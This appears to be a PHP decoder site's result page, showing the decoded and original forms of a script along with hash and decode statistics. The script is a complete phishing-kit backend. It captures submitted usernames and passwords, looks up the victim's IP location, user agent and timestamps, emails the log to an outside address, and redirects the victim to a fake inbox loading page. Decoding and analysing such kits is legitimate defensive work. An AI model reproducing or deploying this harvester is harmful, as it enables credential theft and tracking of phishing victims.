Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $login = $_POST['login']; require_once('./geoplugin.class.php'); $geoplugin..

Decoded Output download

<?php 
 
$login = $_POST['login']; 
 
require_once('./geoplugin.class.php'); 
 
$geoplugin = new geoPlugin(); 
 
$geoplugin->locate(); 
 
$date = gmdate ("Y-n-d"); 
 
$time = gmdate ("H:i:s"); 
 
$browser = $_SERVER['HTTP_USER_AGENT']; 
 
$message .= "=============+ LOGS +=============
"; 
 
$message .= "username: ".$_POST['login']."
"; 
 
$message .= "Password: ".$_POST['passwd']."
"; 
 
$message .= "============= [ Loc Info ] =============
"; 
 
$message .= 	"IP: {$geoplugin->ip}
"; 
 
$message .= 	"City: {$geoplugin->city}
"; 
 
$message .= 	"Region: {$geoplugin->region}
"; 
 
$message .= 	"Country Name: {$geoplugin->countryName}
"; 
 
$message .= 	"Country Code: {$geoplugin->countryCode}
"; 
 
$message .= 	"User-Agent: ".$browser."
"; 
 
$message.= "Date Log  : ".$date."
"; 
 
$message.= "Time Log  : ".$time."
"; 
 
 
 
 
 
$domain = 'cnmail'; 
 
$subj = "I don see result"; 
 
$from = "From: $domain<west>
"; 
 
mail(" [email protected]",$subj,$message,$from,$domain); 
 
 
 
header("Location: loading.php?Email=$login&.rand=13InboxLight.aspx?n=1774256418&fid=4#n=1252899642&fid=1&fav=1"); 
 
?>

Did this file decode correctly?

Original Code

<?php

$login = $_POST['login'];

require_once('./geoplugin.class.php');

$geoplugin = new geoPlugin();

$geoplugin->locate();

$date = gmdate ("Y-n-d");

$time = gmdate ("H:i:s");

$browser = $_SERVER['HTTP_USER_AGENT'];

$message .= "=============+ LOGS +=============\n";

$message .= "username: ".$_POST['login']."\n";

$message .= "Password: ".$_POST['passwd']."\n";

$message .= "============= [ Loc Info ] =============\n";

$message .= 	"IP: {$geoplugin->ip}\n";

$message .= 	"City: {$geoplugin->city}\n";

$message .= 	"Region: {$geoplugin->region}\n";

$message .= 	"Country Name: {$geoplugin->countryName}\n";

$message .= 	"Country Code: {$geoplugin->countryCode}\n";

$message .= 	"User-Agent: ".$browser."\n";

$message.= "Date Log  : ".$date."\n";

$message.= "Time Log  : ".$time."\n";





$domain = 'cnmail';

$subj = "I don see result";

$from = "From: $domain<west>\n";

mail(" [email protected]",$subj,$message,$from,$domain);



header("Location: loading.php?Email=$login&.rand=13InboxLight.aspx?n=1774256418&fid=4#n=1252899642&fid=1&fav=1");

?>

Function Calls

None

Variables

$login None

Stats

MD5 eb1356515ebe2af3aebbb4f27e7f2f93
Eval Count 0
Decode Time 85 ms